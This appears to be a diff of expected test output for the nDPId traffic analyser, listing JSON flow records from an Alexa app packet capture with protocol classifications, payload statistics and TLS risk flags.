+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":130,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976139643,"flow_last_seen":1490976140773,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13859,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51996,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":131,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976139643,"flow_last_seen":1490976140781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15821,"flow_avg_l4_payload_len":527,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.63.56","src_port":51997,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Amazon","breed":"Acceptable","category":"Web"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976023264,"flow_last_seen":1490976023264,"flow_idle_time":200000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":630,"flow_avg_l4_payload_len":315,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976055356,"flow_last_seen":1490976180796,"flow_idle_time":620000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} +00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976076275,"flow_last_seen":1490976077663,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":2126,"flow_avg_l4_payload_len":212,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00928{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":147,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1490976187511,"flow_last_seen":1490976190310,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9181,"flow_avg_l4_payload_len":437,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.28.178","src_port":38757,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {}} 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976089173,"flow_last_seen":1490976090510,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976186884,"flow_last_seen":1490976197347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":15483,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976089426,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6884,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13077,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":145,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1490976186884,"flow_last_seen":1490976197347,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":15483,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.23.94","src_port":44912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1490976089426,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":1179,"flow_avg_l4_payload_len":117,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} +00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6884,"flow_avg_l4_payload_len":299,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40853,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1490976107365,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13077,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40854,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976107366,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40855,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"finished","flow_packets_processed":98,"flow_first_seen":1490976107455,"flow_last_seen":1490976110047,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":31431,"flow_avg_l4_payload_len":320,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40856,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1490976130073,"flow_last_seen":1490976134134,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":8590,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":41,"flow_first_seen":1490976136930,"flow_last_seen":1490976140745,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":13686,"flow_avg_l4_payload_len":333,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976142629,"flow_last_seen":1490976148981,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3595,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40878,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027514,"flow_last_seen":1490976027560,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":113,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":53188,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":200000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1490976076042,"flow_last_seen":1490976177233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3494,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":159,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1490976196942,"flow_last_seen":1490976198168,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11051,"flow_avg_l4_payload_len":460,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47605,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":160,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1490976197297,"flow_last_seen":1490976198043,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":9036,"flow_avg_l4_payload_len":322,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.121","src_port":47606,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -01043{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1490976071392,"flow_last_seen":1490976176431,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5656,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976031581,"flow_last_seen":1490976031687,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":41030,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1490976023267,"flow_last_seen":1490976023267,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976107217,"flow_last_seen":1490976107359,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":14476,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":153,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976195983,"flow_last_seen":1490976196942,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13938,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41912,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":350,"flow_first_seen":1490976195984,"flow_last_seen":1490976198040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":248700,"flow_avg_l4_payload_len":710,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41913,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1490976195985,"flow_last_seen":1490976196943,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":15782,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.84.62.115","src_port":41914,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976177026,"flow_last_seen":1490976177105,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":4312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027724,"flow_last_seen":1490976027725,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":10462,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024847,"flow_last_seen":1490976024848,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":55619,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976043611,"flow_last_seen":1490976043811,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":51,"flow_tot_l4_payload_len":86,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":43350,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1490976195529,"flow_last_seen":1490976198776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":34748,"flow_avg_l4_payload_len":534,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.143","src_port":41828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":56,"flow_first_seen":1490976085644,"flow_last_seen":1490976098828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":21353,"flow_avg_l4_payload_len":381,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 